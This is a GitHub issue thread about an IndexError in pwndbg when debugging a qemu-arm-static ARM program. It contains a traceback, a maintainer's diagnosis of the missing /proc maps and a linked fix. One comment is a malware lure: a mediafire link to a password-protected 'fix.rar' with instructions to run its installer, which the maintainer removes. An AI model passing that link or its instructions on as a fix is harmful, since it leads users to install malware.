### ISSUE TITLE
When using gdb-multiarch to debug the qemu-arm-static program

### ISSUE THREAD

**Issue by tower111** [pwndbg/pwndbg#2391]
### Description

The program startup command is sudo chroot . ./qemu-arm-static -strace -g 55 ./program

gdb-multiarch ./program
```
For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 165 pwndbg commands and 47 shell commands. Type pwndbg [--shell | --all] [filter] for a list.
pwndbg: created $rebase, $base, $bn_sym, $bn_var, $bn_eval, $ida GDB functions (can be used with print/break)
The target architecture is set to "arm".

warning: No executable has been specified and target does not support
determining executable automatically.  Try using the "file" command.
0xff7c7790 in ?? ()
Exception occurred: Error: list index out of range (<class 'IndexError'>)
For more info invoke `set exception-verbose on` and rerun the command
or debug it by yourself with `set exception-debugger on`
Python Exception <class 'IndexError'>: list index out of range
Reading symbols from ./program/www/cgi-bin/main-cgi...
(No debugging symbols found in ./program/www/cgi-bin/main-cgi)
------- tip of the day (disable with set show-tips off) -------
Use plist command to dump elements of linked list
Exception occurred: Error: list index out of range (<class 'IndexError'>)
For more info invoke `set exception-verbose on` and rerun the command
or debug it by yourself with `set exception-debugger on`
Python Exception <class 'IndexError'>: list index out of range
pwndbg> 
pwndbg> set exception-verbose on
Set whether to print a full stacktrace for exceptions raised in Pwndbg commands to 'on'.
Traceback (most recent call last):
  File "/home/t1/tools/pwndbg/pwndbg/gdblib/events.py", line 156, in caller
    func()
  File "/home/t1/tools/pwndbg/pwndbg/lib/cache.py", line 149, in decorator
    value = func(*a, **kw)
  File "/home/t1/tools/pwndbg/pwndbg/gdblib/stack.py", line 72, in is_executable
    ehdr = pwndbg.gdblib.elf.exe()
  File "/home/t1/tools/pwndbg/pwndbg/gdblib/proc.py", line 172, in wrapper
    return func(*a, **kw)
  File "/home/t1/tools/pwndbg/pwndbg/lib/cache.py", line 149, in decorator
    value = func(*a, **kw)
  File "/home/t1/tools/pwndbg/pwndbg/gdblib/elf.py", line 251, in exe
    return load(e)
  File "/home/t1/tools/pwndbg/pwndbg/gdblib/elf.py", line 290, in load
    return get_ehdr(pointer)[1]
  File "/home/t1/tools/pwndbg/pwndbg/gdblib/elf.py", line 311, in get_ehdr
    vmmap = pwndbg.gdblib.vmmap.find(pointer, should_explore=False)
  File "/home/t1/tools/pwndbg/pwndbg/lib/cache.py", line 149, in decorator
    value = func(*a, **kw)
  File "/home/t1/tools/pwndbg/pwndbg/gdblib/vmmap.py", line 206, in find
    for page in get():
  File "/home/t1/tools/pwndbg/pwndbg/lib/cache.py", line 149, in decorator
    value = func(*a, **kw)
  File "/home/t1/tools/pwndbg/pwndbg/gdblib/vmmap.py", line 128, in get
    proc_maps = get_known_maps()
  File "/home/t1/tools/pwndbg/pwndbg/lib/cache.py", line 149, in decorator
    value = func(*a, **kw)
  File "/home/t1/tools/pwndbg/pwndbg/gdblib/vmmap.py", line 114, in get_known_maps
    proc_maps = info_proc_maps()
  File "/home/t1/tools/pwndbg/pwndbg/lib/cache.py", line 149, in decorator
    value = func(*a, **kw)
  File "/home/t1/tools/pwndbg/pwndbg/gdblib/vmmap.py", line 487, in info_proc_maps
    perms_available = "Perms" in info_proc_mappings[3]
IndexError: list index out of range
```
```
gdb-multiarch --version
GNU gdb (Ubuntu 12.1-0ubuntu1~22.04.2) 12.1
Copyright (C) 2022 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
./qemu-arm-static --version
qemu-arm version 4.2.1 (Debian 1:4.2-3ubuntu6.29)
Copyright (c) 2003-2019 Fabrice Bellard and the QEMU Project developers

uname -ar
Linux t1-virtual-machine 6.8.0-40-generic #40~22.04.3-Ubuntu SMP PREEMPT_DYNAMIC Tue Jul 30 17:30:19 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
```

**Comment by disconnect3d** [comment]
cc @OBarronCS seems like a recent change could introduce this bug, can you take a look?

**Comment by HarbingerOfFire** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by disconnect3d** [comment]
@HarbingerOfFire I have no idea what was your comment about, so I removed them.

**Comment by disconnect3d** [comment]
The bug comes from the fact that we may not have mappings information in that case:
```
> /root/pwndbg/pwndbg/gdblib/vmmap.py(487)info_proc_maps()
    486     # See if "Perms" is in the header line
--> 487     perms_available = "Perms" in info_proc_mappings[3]
    488

ipdb> print(info_proc_mappings)
['process 1', "warning: unable to open /proc file '/proc/1/maps'"]
```

**Comment by HarbingerOfFire** [comment]
> @HarbingerOfFire I have no idea what was your comment about, so I removed them.

Thank you, it was a malware that got sent automatically. I'm working on clean up for it now.

**Comment by OBarronCS** [comment]
Added a check for this in #2393
